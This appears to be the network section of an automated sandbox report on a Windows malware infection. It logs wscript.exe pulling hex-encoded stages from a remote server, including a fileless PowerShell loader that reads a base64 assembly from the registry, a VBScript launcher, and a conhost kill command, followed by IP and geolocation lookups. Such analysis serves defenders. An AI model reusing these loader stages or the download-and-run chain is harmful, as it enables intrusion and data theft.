                                                            Data Ascii: 3D3D414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414
                                                            Nov 18, 2024 13:42:59.776120901 CET1236INData Raw: 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34
                                                            Data Ascii: 141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141
                                                            Nov 18, 2024 13:42:59.776137114 CET1236INData Raw: 44 33 39 33 32 36 33 37 36 34 41 33 33 35 39 37 30 33 31 35 37 34 43 37 41 34 36 35 37 36 32 36 43 36 38 33 32 35 39 37 41 37 30 36 41 36 32 37 39 35 36 36 45 34 39 33 39 34 44 36 45 36 32 37 33 33 31 34 37 36 35 36 37 33 38 36 44 35 41 37 35 36
                                                            Data Ascii: D393263764A33597031574C7A4657626C6832597A706A6279566E49394D6E627331476567386D5A756C45647A566E6330784449676F51442B3869497742585975343262705258596A6C47627742585135316B49395557626835474969416A4C7734434D75456A4939343262704E6E636C5A4849355258613035
                                                            Nov 18, 2024 13:42:59.776150942 CET1236INData Raw: 31 34 31 34 31 35 35 34 37 34 31 37 34 34 32 35 31 35 39 34 31 33 34 34 37 34 31 36 43 34 32 34 31 36 32 34 31 36 42 34 37 34 31 34 37 34 32 34 31 36 32 34 31 34 35 34 37 34 31 37 35 34 32 35 31 36 31 34 31 36 33 34 37 34 31 37 30 34 32 36 37 36
                                                            Data Ascii: 1414155474174425159413447416C424162416B474147424162414547417542516141634741704267634138454142416745417745414141414141414141414177634173474179425159413047416C42415A4145474179424156417747416842775A415547414D4251414145414171414141415144417941414D
                                                            Nov 18, 2024 13:42:59.776161909 CET1236INData Raw: 35 34 31 34 43 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 37 35 34 32 37 37 36 32 34 31 36 42 34 37 34 31 33 30 34 32 35 31 35 39 34 31 37 37 34 37 34 31 37 41 34 32 36 37 36 32 34 31 34 35 34 37 34 31 37 39 34 32 34 31 35 36 34 31 34
                                                            Data Ascii: 5414C41414141414141414175427762416B474130425159417747417A4267624145474179424156414141414541414A4141414141417762415947417542515341554741734251614159454179425159415946414241414141514541414141414141414141414141414141414141514141414141454141414141
                                                            Nov 18, 2024 13:42:59.776177883 CET1236INData Raw: 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 33 39 33 38 34 38 34 31 36 39 35 32 34 37 36 33 37 35 35 31 36 41 34 44 37 37 34 39 34 34 34 44 37 38 34 39 34 34 34 44 36 42 37 38 35 37 36 31 33 31 34 41 34 35 35 38 36 45 35 36 36 45 35
                                                            Data Ascii: 1414141414141414141393848416952476375516A4D7749444D7849444D6B785761314A45586E566E596C524558714A326263526A4D7749444D7849444D6B785761314A45583049444D7941544D7941445A736C576443784663765233617A5647526335576174525759634E6E636C4E585663707A5141414141
                                                            Nov 18, 2024 13:42:59.776192904 CET1236INData Raw: 36 35 36 33 32 35 39 37 35 34 36 34 37 36 34 37 41 33 35 35 37 35 33 36 36 33 39 35 36 35 41 33 30 34 36 35 37 35 41 37 39 34 45 36 42 34 35 37 33 33 39 33 32 35 39 37 36 35 32 33 33 36 32 37 39 34 32 34 36 36 34 37 35 35 36 35 37 36 31 37 33 34
                                                            Data Ascii: 6563259754647647A3557536639565A3046575A794E6B4573393259765233627942466475565761734E4563305248537746326254357963733932597652336279426C4C7A563259705A6E636C4E6C4C695632567530575A304E5865545244414245474141414141414941414267414141416A4C7734794E7563
                                                            Nov 18, 2024 13:42:59.776303053 CET1236INData Raw: 31 34 31 34 38 34 31 35 31 34 31 34 39 34 35 37 37 36 33 33 33 33 39 36 44 36 33 36 46 35 32 36 43 36 32 37 36 36 43 34 37 36 34 37 37 35 36 33 32 35 39 33 34 35 36 36 42 36 32 37 36 33 35 34 35 36 33 36 38 34 41 33 33 35 36 35 37 34 39 34 31 35
                                                            Data Ascii: 141484151414945776333396D636F526C62766C47647756325934566B6276354563684A33565749415641454141423442414141414141674141426741415441414B456768454167414242436F4541675142394A42414951414A5341414345456D45416741424949424149514144534141434541674851455141
                                                            Nov 18, 2024 13:42:59.776315928 CET1236INData Raw: 32 36 33 35 31 34 32 35 41 34 33 36 46 34 35 34 46 34 35 36 37 34 31 36 37 36 33 35 31 36 44 34 31 34 42 34 32 34 31 36 37 35 35 35 31 36 43 34 31 34 37 35 32 36 31 35 33 34 35 34 31 34 31 34 38 37 37 34 32 34 38 34 33 34 39 34 31 34 31 34 36 33
                                                            Data Ascii: 26351425A436F454F4567416763516D414B42416755516C4147526153454141487742484349414146306E4543306E45446377426B49524148515159534577424567674542634142414D424167514144534577424551694542676945565951595345414B53556842494952416F49524647776745426769455659
                                                            Nov 18, 2024 13:42:59.776333094 CET1236INData Raw: 32 36 33 37 41 34 36 33 30 35 38 33 30 35 36 33 32 35 41 34 31 36 42 35 38 35 41 34 43 36 43 36 45 36 33 33 30 34 45 35 38 36 31 36 45 35 36 36 44 35 35 34 31 36 42 35 38 35 41 34 43 34 41 35 37 36 34 35 34 33 35 35 37 35 41 37 37 33 39 34 35 34
                                                            Data Ascii: 2637A4630583056325A416B585A4C6C6E63304E58616E566D55416B585A4C4A57645435575A7739454135316B4C69424165764A305A7A314541304A585A3235326244424164735633636C4A4665764A305A7A31454130785764685A575A453946646C644741304E575A71396D63516C5854415133596C706D59
                                                            Nov 18, 2024 13:42:59.781297922 CET1236INData Raw: 41 34 36 36 44 35 31 37 33 34 36 35 37 36 34 37 41 36 43 36 44 35 36 37 35 35 31 36 45 35 41 37 36 34 45 33 33 36 32 37 39 34 45 35 37 36 31 34 45 34 32 37 37 36 33 36 41 36 43 34 37 36 34 37 41 33 39 36 44 36 32 36 45 34 36 35 37 36 31 34 35 33
                                                            Data Ascii: A466D51734657647A6C6D5675516E5A764E3362794E57614E4277636A6C47647A396D626E465761453553626C523363354E46417956585A73466D5674396D6241493362304E325975416763765233597541676376525859326C47646A46454179396D63795645646A566D61764A48553056325541493362794A
                                                            Nov 18, 2024 13:43:00.099411011 CET152OUTGET /1211/r HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Accept: */*
                                                            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                            Host: 144.91.79.54
                                                            Nov 18, 2024 13:43:00.351298094 CET1236INHTTP/1.1 200 OK
                                                            Date: Mon, 18 Nov 2024 12:43:00 GMT
                                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                            Last-Modified: Wed, 09 Oct 2024 05:50:42 GMT
                                                            ETag: "9800-62404d5968a93"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 38912
                                                            Keep-Alive: timeout=5, max=99
                                                            Connection: Keep-Alive
                                                            Data Raw: 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 [TRUNCATED]
                                                            Data Ascii: 00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
                                                            Nov 18, 2024 13:43:00.661837101 CET175OUTGET /1211/upcYWNLeVWW8atGcZt0Z.txt HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Accept: */*
                                                            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                            Host: 144.91.79.54
                                                            Nov 18, 2024 13:43:00.914413929 CET1236INHTTP/1.1 200 OK
                                                            Date: Mon, 18 Nov 2024 12:43:00 GMT
                                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                            Last-Modified: Sun, 17 Nov 2024 22:24:33 GMT
                                                            ETag: "2dc00-6272343b4fbfa"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 187392
                                                            Keep-Alive: timeout=5, max=98
                                                            Connection: Keep-Alive
                                                            Content-Type: text/plain
                                                            Data Raw: 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 [TRUNCATED]
                                                            Data Ascii: 0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
                                                            Nov 18, 2024 13:43:02.004076004 CET153OUTGET /1211/cn HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Accept: */*
                                                            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                            Host: 144.91.79.54
                                                            Nov 18, 2024 13:43:02.256324053 CET347INHTTP/1.1 200 OK
                                                            Date: Mon, 18 Nov 2024 12:43:02 GMT
                                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                            Last-Modified: Sat, 09 Nov 2024 16:14:35 GMT
                                                            ETag: "42-6267d29e174cb"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 66
                                                            Keep-Alive: timeout=5, max=97
                                                            Connection: Keep-Alive
                                                            Data Raw: 35 33 37 34 36 46 37 30 32 44 35 30 37 32 36 46 36 33 36 35 37 33 37 33 32 30 32 44 34 45 36 31 36 44 36 35 32 30 36 33 36 46 36 45 36 38 36 46 37 33 37 34 32 30 32 44 34 36 36 46 37 32 36 33 36 35
                                                            Data Ascii: 53746F702D50726F63657373202D4E616D6520636F6E686F7374202D466F726365


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            1192.168.2.449731144.91.79.54807064C:\Windows\System32\wscript.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 18, 2024 13:43:11.721355915 CET152OUTGET /1211/v HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Accept: */*
                                                            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                            Host: 144.91.79.54
                                                            Nov 18, 2024 13:43:12.774035931 CET762INHTTP/1.1 200 OK
                                                            Date: Mon, 18 Nov 2024 12:43:12 GMT
                                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                            Last-Modified: Wed, 25 Sep 2024 15:44:42 GMT
                                                            ETag: "1de-622f3802a248c"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 478
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Data Raw: 37 42 35 42 37 44 34 31 37 30 37 30 34 34 36 46 36 44 36 31 36 39 36 45 37 42 35 44 37 44 33 41 33 41 34 33 37 35 37 32 37 32 36 35 36 45 37 34 34 34 36 46 36 44 36 31 36 39 36 45 32 45 34 43 36 46 36 31 36 34 37 42 32 38 37 44 35 42 34 33 36 46 36 45 37 36 36 35 37 32 37 34 37 42 35 44 37 44 33 41 33 41 34 36 37 32 36 46 36 44 34 32 36 31 37 33 36 35 33 36 33 34 35 33 37 34 37 32 36 39 36 45 36 37 37 42 32 38 37 44 37 42 32 38 37 44 32 44 36 41 36 46 36 39 36 45 32 30 37 42 32 38 37 44 34 37 36 35 37 34 32 44 34 39 37 34 36 35 36 44 35 30 37 32 36 46 37 30 36 35 37 32 37 34 37 39 32 30 32 44 34 43 36 39 37 34 36 35 37 32 36 31 36 43 35 30 36 31 37 34 36 38 32 30 32 37 34 38 34 42 34 33 35 35 33 41 35 43 35 33 36 46 36 36 37 34 37 37 36 31 37 32 36 35 35 43 37 43 37 30 36 31 37 34 36 38 37 43 32 37 32 30 32 44 34 45 36 31 36 44 36 35 32 30 32 37 37 33 32 37 37 42 32 39 37 44 32 45 37 33 32 30 37 43 32 30 34 36 36 46 37 32 34 35 36 31 36 33 36 38 32 44 34 46 36 32 36 41 36 35 36 33 37 34 32 30 37 42 [TRUNCATED]
                                                            Data Ascii: 7B5B7D417070446F6D61696E7B5D7D3A3A43757272656E74446F6D61696E2E4C6F61647B287D5B436F6E766572747B5D7D3A3A46726F6D426173653634537472696E677B287D7B287D2D6A6F696E207B287D4765742D4974656D50726F7065727479202D4C69746572616C506174682027484B43553A5C536F6674776172655C7C706174687C27202D4E616D65202773277B297D2E73207C20466F72456163682D4F626A656374207B7B7D245F7B5B7D2D312E2E2D7B287D245F2E4C656E6774687B297D7B5D7D7B7D7D7B297D7B297D7B297D3B207B5B7D622E627B5D7D3A3A627B287D277C706174687C277B297D
                                                            Nov 18, 2024 13:43:12.784064054 CET762INHTTP/1.1 200 OK
                                                            Date: Mon, 18 Nov 2024 12:43:12 GMT
                                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                            Last-Modified: Wed, 25 Sep 2024 15:44:42 GMT
                                                            ETag: "1de-622f3802a248c"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 478
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Data Raw: 37 42 35 42 37 44 34 31 37 30 37 30 34 34 36 46 36 44 36 31 36 39 36 45 37 42 35 44 37 44 33 41 33 41 34 33 37 35 37 32 37 32 36 35 36 45 37 34 34 34 36 46 36 44 36 31 36 39 36 45 32 45 34 43 36 46 36 31 36 34 37 42 32 38 37 44 35 42 34 33 36 46 36 45 37 36 36 35 37 32 37 34 37 42 35 44 37 44 33 41 33 41 34 36 37 32 36 46 36 44 34 32 36 31 37 33 36 35 33 36 33 34 35 33 37 34 37 32 36 39 36 45 36 37 37 42 32 38 37 44 37 42 32 38 37 44 32 44 36 41 36 46 36 39 36 45 32 30 37 42 32 38 37 44 34 37 36 35 37 34 32 44 34 39 37 34 36 35 36 44 35 30 37 32 36 46 37 30 36 35 37 32 37 34 37 39 32 30 32 44 34 43 36 39 37 34 36 35 37 32 36 31 36 43 35 30 36 31 37 34 36 38 32 30 32 37 34 38 34 42 34 33 35 35 33 41 35 43 35 33 36 46 36 36 37 34 37 37 36 31 37 32 36 35 35 43 37 43 37 30 36 31 37 34 36 38 37 43 32 37 32 30 32 44 34 45 36 31 36 44 36 35 32 30 32 37 37 33 32 37 37 42 32 39 37 44 32 45 37 33 32 30 37 43 32 30 34 36 36 46 37 32 34 35 36 31 36 33 36 38 32 44 34 46 36 32 36 41 36 35 36 33 37 34 32 30 37 42 [TRUNCATED]
                                                            Data Ascii: 7B5B7D417070446F6D61696E7B5D7D3A3A43757272656E74446F6D61696E2E4C6F61647B287D5B436F6E766572747B5D7D3A3A46726F6D426173653634537472696E677B287D7B287D2D6A6F696E207B287D4765742D4974656D50726F7065727479202D4C69746572616C506174682027484B43553A5C536F6674776172655C7C706174687C27202D4E616D65202773277B297D2E73207C20466F72456163682D4F626A656374207B7B7D245F7B5B7D2D312E2E2D7B287D245F2E4C656E6774687B297D7B5D7D7B7D7D7B297D7B297D7B297D3B207B5B7D622E627B5D7D3A3A627B287D277C706174687C277B297D


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            2192.168.2.449732144.91.79.54807064C:\Windows\System32\wscript.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 18, 2024 13:43:13.131473064 CET155OUTGET /1211/file HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Accept: */*
                                                            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                            Host: 144.91.79.54
                                                            Nov 18, 2024 13:43:13.991144896 CET1236INHTTP/1.1 200 OK
                                                            Date: Mon, 18 Nov 2024 12:43:13 GMT
                                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                            Last-Modified: Tue, 12 Nov 2024 13:34:41 GMT
                                                            ETag: "f70-626b7478f5049"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 3952
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Data Raw: 34 46 37 30 37 34 36 39 36 46 36 45 32 30 34 35 37 38 37 30 36 43 36 39 36 33 36 39 37 34 30 41 30 41 32 37 32 30 34 45 36 46 36 44 36 32 37 32 36 35 32 30 36 34 36 35 36 43 32 30 37 30 37 32 36 46 37 39 36 35 36 33 37 34 36 46 33 41 32 30 37 43 37 30 36 31 37 34 36 38 37 43 30 41 32 37 32 30 35 36 36 31 37 32 36 39 36 31 36 32 36 43 36 35 37 33 32 30 36 37 36 43 36 46 36 32 36 31 36 43 36 35 37 33 30 41 34 34 36 39 36 44 32 30 34 31 34 32 34 33 32 43 32 30 34 34 34 35 34 36 32 43 32 30 34 37 34 38 34 39 30 41 35 33 36 35 37 34 32 30 34 31 34 32 34 33 32 30 33 44 32 30 34 33 37 32 36 35 36 31 37 34 36 35 34 46 36 32 36 41 36 35 36 33 37 34 32 38 32 32 35 37 35 33 36 33 37 32 36 39 37 30 37 34 32 45 35 33 36 38 36 35 36 43 36 43 32 32 32 39 30 41 34 34 34 35 34 36 32 30 33 44 32 30 34 31 34 32 34 33 32 45 34 35 37 38 37 30 36 31 36 45 36 34 34 35 36 45 37 36 36 39 37 32 36 46 36 45 36 44 36 35 36 45 37 34 35 33 37 34 37 32 36 39 36 45 36 37 37 33 32 38 32 32 32 35 37 37 36 39 36 45 36 34 36 39 37 32 [TRUNCATED]
                                                            Data Ascii: 4F7074696F6E204578706C696369740A0A27204E6F6D6272652064656C2070726F796563746F3A207C706174687C0A27205661726961626C657320676C6F62616C65730A44696D204142432C204445462C204748490A53657420414243203D204372656174654F626A6563742822575363726970742E5368656C6C22290A444546203D204142432E457870616E64456E7669726F6E6D656E74537472696E677328222577696E6469722522290A0A272050726F6772616D61207072696E636970616C0A43616C6C204A4B4C28290A43616C6C204D4E4F28290A0A2720496E696369616C697A616369F36E206465206C6F7320706172E16D6574726F732064656C2070726F6772616D610A537562204A4B4C28290A20202020474849203D20300A456E64205375620A0A2720527574696E61207072696E636970616C20706172612067657374696F6E6172206C6120656A6563756369F36E2064656C2070726F6772616D610A537562204D4E4F28290A20202020446F205768696C6520474849203C2031303030302027204CED6D69746520646520697465726163696F6E657320706172612064656D6F737472616369F36E0A202020202020202050515228290A2020202020202020575363726970742E536C6565702031303030300
                                                            Nov 18, 2024 13:43:13.991180897 CET1236INData Raw: 41 32 30 32 30 32 30 32 30 32 30 32 30 32 30 32 30 34 37 34 38 34 39 32 30 33 44 32 30 34 37 34 38 34 39 32 30 32 42 32 30 33 31 30 41 32 30 32 30 32 30 32 30 34 43 36 46 36 46 37 30 30 41 34 35 36 45 36 34 32 30 35 33 37 35 36 32 30 41 30 41 32
                                                            Data Ascii: A2020202020202020474849203D20474849202B20310A202020204C6F6F700A456E64205375620A0A272050726F636564696D69656E746F207061726120766572696669636172206520696E696369617220506F7765725368656C6C207369206573206E656365736172696F0A5375622050515228290A202020
                                                            Nov 18, 2024 13:43:13.991195917 CET1236INData Raw: 45 32 30 33 30 32 39 30 41 34 35 36 45 36 34 32 30 34 36 37 35 36 45 36 33 37 34 36 39 36 46 36 45 30 41 30 41 32 37 32 30 35 30 37 32 36 46 36 33 36 35 36 34 36 39 36 44 36 39 36 35 36 45 37 34 36 46 32 30 37 30 36 31 37 32 36 31 32 30 36 39 36
                                                            Data Ascii: E2030290A456E642046756E6374696F6E0A0A272050726F636564696D69656E746F207061726120696E696369617220506F7765725368656C6C0A5375622056575828290A202020204142432E52756E20444546202620225C73797374656D33325C57696E646F7773506F7765725368656C6C5C76312E305C70
                                                            Nov 18, 2024 13:43:13.991210938 CET529INData Raw: 30 32 30 32 45 34 31 37 30 37 30 34 31 36 33 37 34 36 39 37 36 36 31 37 34 36 35 32 30 35 38 35 39 35 41 32 45 35 30 37 32 36 46 36 33 36 35 37 33 37 33 34 39 36 34 30 41 32 30 32 30 32 30 32 30 32 30 32 30 32 30 32 30 32 45 35 33 36 35 36 45 36
                                                            Data Ascii: 0202E41707041637469766174652058595A2E50726F6365737349640A20202020202020202E53656E644B657973202E526567526561642822484B45595F43555252454E545F555345525C536F6674776172655C7C706174687C5C7622290A20202020202020202E53656E644B65797320227B454E5445527D22


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            3192.168.2.449883193.122.6.168805184C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 18, 2024 13:44:22.169620037 CET151OUTGET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
                                                            Connection: Keep-Alive
                                                            Nov 18, 2024 13:44:23.024297953 CET323INHTTP/1.1 200 OK
                                                            Date: Mon, 18 Nov 2024 12:44:22 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 106
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            X-Request-ID: 91c9ca2e14ffcbbd8fd9851d92fb627c
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>
                                                            Nov 18, 2024 13:44:23.032669067 CET127OUTGET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
                                                            Nov 18, 2024 13:44:23.277934074 CET323INHTTP/1.1 200 OK
                                                            Date: Mon, 18 Nov 2024 12:44:23 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 106
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            X-Request-ID: 1e2c8d4031f1b01e0c6ccaaa5949c947
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>
                                                            Nov 18, 2024 13:44:23.515419006 CET323INHTTP/1.1 200 OK
                                                            Date: Mon, 18 Nov 2024 12:44:23 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 106
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            X-Request-ID: 1e2c8d4031f1b01e0c6ccaaa5949c947
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>
                                                            Nov 18, 2024 13:44:30.042268991 CET127OUTGET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
                                                            Nov 18, 2024 13:44:30.289416075 CET323INHTTP/1.1 200 OK
                                                            Date: Mon, 18 Nov 2024 12:44:30 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 106
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            X-Request-ID: f93c9973bcb31de4ae210d433ec6b951
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.449889188.114.96.34435184C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-11-18 12:44:24 UTC87OUTGET /xml/155.94.241.187 HTTP/1.1
                                                            Host: reallyfreegeoip.org
                                                            Connection: Keep-Alive
                                                            2024-11-18 12:44:24 UTC856INHTTP/1.1 200 OK
                                                            Date: Mon, 18 Nov 2024 12:44:24 GMT
                                                            Content-Type: text/xml
                                                            Content-Length: 358
                                                            Connection: close
                                                            Cache-Control: max-age=31536000
                                                            CF-Cache-Status: HIT
                                                            Age: 35347
                                                            Last-Modified: Mon, 18 Nov 2024 02:55:17 GMT
                                                            Accept-Ranges: bytes
